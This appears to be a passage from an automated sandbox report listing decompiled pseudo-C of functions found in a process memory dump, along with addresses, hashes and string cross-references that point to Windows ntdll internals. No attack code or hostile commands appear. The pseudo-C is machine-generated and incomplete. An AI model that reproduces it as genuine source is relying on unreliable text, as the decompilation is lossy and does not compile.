            0x00000000
            0x0445d349

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 9237b2aa5772890ebac141b88264088ffca9b1f97b70000f1e7ddb02eb2bbe93
            • Instruction ID: 035b73b8cb2ce813e3dbf7bbfe95e45b1246bf541dd816101844798a38b2b831
            • Opcode Fuzzy Hash: 9237b2aa5772890ebac141b88264088ffca9b1f97b70000f1e7ddb02eb2bbe93
            • Instruction Fuzzy Hash: 1931A4B19093059FDF20DF29C88095BBBE8EF85654F00492FF99593221EA38ED05DB93
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04431B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
            Download Yara Rule
            C-Code - Quality: 72%
            			E04431B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0446BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0446A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0446A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L04444620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









            0x04431b8f
            0x04431b9a
            0x04431b9c
            0x04431b9e
            0x04431ba3
            0x04487010
            0x04487010
            0x00000000
            0x04431ba9
            0x04431ba9
            0x04431bae
            0x00000000
            0x04431bc5
            0x04431bca
            0x04431bcf
            0x04431bd0
            0x04431bd1
            0x04431bd2
            0x04431bd6
            0x04431bdc
            0x04431be0
            0x04486ffc
            0x04487000
            0x00000000
            0x04487006
            0x04487009
            0x04487009
            0x04431be6
            0x04431bec
            0x04431c0b
            0x04431c0b
            0x04431c0c
            0x04431c11
            0x04431c12
            0x04431c15
            0x04431c1b
            0x04431c1f
            0x04431c31
            0x04431c33
            0x04487026
            0x04487026
            0x04431c21
            0x04431c24
            0x04431c24
            0x04431bee
            0x04431bee
            0x04431bf2
            0x04431c3a
            0x04431bf4
            0x04431bf4
            0x04431c05
            0x04431c05
            0x04431c09
            0x04431c3e
            0x00000000
            0x00000000
            0x00000000
            0x04431c09
            0x04431bec
            0x04431be0
            0x04431bae
            0x04431c2e

            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: WindowsExcludedProcs
            • API String ID: 0-3583428290
            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
            • Instruction ID: 159b07eb39adabb1f332b2dc6a8b237a59beee8b95018b6c2a32207adfa4c654
            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
            • Instruction Fuzzy Hash: 8621D336600228ABDF31AE95C840F5FB7ADAB89F51F25442BE9049B300E634F90297A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044D8DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
            Download Yara Rule
            C-Code - Quality: 71%
            			E044D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x4500d50);
				E0447D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E044B5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0447DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0447DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0447D130(_t34, _t39, _t40);
			}





            0x044d8df1
            0x044d8df1
            0x044d8df1
            0x044d8df1
            0x044d8df1
            0x044d8df1
            0x044d8df3
            0x044d8df8
            0x044d8dfd
            0x044d8e00
            0x044d8e0e
            0x044d8e2a
            0x044d8e36
            0x044d8e38
            0x044d8e3c
            0x044d8e46
            0x044d8e46
            0x044d8e36
            0x044d8e50
            0x044d8e56
            0x044d8e59
            0x044d8e5c
            0x044d8e60
            0x044d8e67
            0x044d8e6d
            0x044d8e73
            0x044d8e74
            0x044d8eb1
            0x044d8ebd

            Strings
            • Critical error detected %lx, xrefs: 044D8E21
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: Critical error detected %lx
            • API String ID: 0-802127002
            • Opcode ID: 25c8db571436769299e7ffb19d8ce9b6ee73f1d11da6e447a369aae5b0d1ad67
            • Instruction ID: cb019627e488bba0d01ea85557df7c450d4b11677458a42238304b95e8fa884f
            • Opcode Fuzzy Hash: 25c8db571436769299e7ffb19d8ce9b6ee73f1d11da6e447a369aae5b0d1ad67
            • Instruction Fuzzy Hash: DC1175B1D10348EBEF29EFA985057EDBBB0BB04318F20421ED468AB382C3346602CF14
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044BFF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
            Download Yara Rule
            Strings
            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 044BFF60
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
            • API String ID: 0-1911121157
            • Opcode ID: 4e68568c4fdade63dccb89deb30bd6d0c42b95295e7d53cb314e1cce02a1fb16
            • Instruction ID: 13ccfca3751d38707486be76cabbfa80f0d40c414260a81c93dd335aaa38ca0c
            • Opcode Fuzzy Hash: 4e68568c4fdade63dccb89deb30bd6d0c42b95295e7d53cb314e1cce02a1fb16
            • Instruction Fuzzy Hash: 39118EB5960144AFEF12EF50CD49BD9BBB1FF08709F14805AE548A72A2C739A944DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044F5BA5, Relevance: .6, Instructions: 592COMMON
            Download Yara Rule
            C-Code - Quality: 88%
            			E044F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x4501178);
				E0447D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E044F4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0446D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E044F5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x45160e8;
								if( *0x45160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x45160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04469710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04466DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0446F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0446F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0446F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0446FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0446FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0446F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0446F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E044F4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0447D130(_t427, _t494, _t511);
				}
			}










































































            0x044f5ba5
            0x044f5baa
            0x044f5baf
            0x044f5bb4
            0x044f5bb6
            0x044f5bbc
            0x044f5bbe
            0x044f5bc4
            0x044f5bcd
            0x044f5bd3
            0x044f5bd6
            0x044f5bdc
            0x044f5be0
            0x044f5be3
            0x044f5beb
            0x044f5bf2
            0x044f5bf8
            0x044f5bfe
            0x044f5c04
            0x044f5c0e
            0x044f5c18
            0x044f5c1f
            0x044f5c25
            0x044f5c2a
            0x044f5c2c
            0x044f5c32
            0x044f5c3a
            0x044f5c3f
            0x044f5c42
            0x044f5c48
            0x044f5c5b
            0x044f5c5b
            0x044f5c2c
            0x044f5cb7
            0x044f5cb9
            0x044f5cbf
            0x044f5cc2
            0x044f5cca
            0x044f5ccb
            0x044f5ccb
            0x044f5cd1
            0x044f5cd7
            0x044f5cda
            0x044f5ce1
            0x044f5ce4
            0x044f5ce7
            0x044f5ced
            0x044f5cf3
            0x044f5cf9
            0x044f5cff
            0x044f5d08
            0x044f5d0a
            0x044f5d0e
            0x044f5d10
            0x00000000
            0x00000000
            0x044f5d16
            0x044f5d1a
            0x00000000
            0x00000000
            0x044f5d20
            0x044f5d22
            0x044f5d25
            0x044f5d2f
            0x044f5d2f
            0x044f5d33
            0x044f5d3d
            0x044f5d49
            0x044f5d4b
            0x00000000
            0x00000000
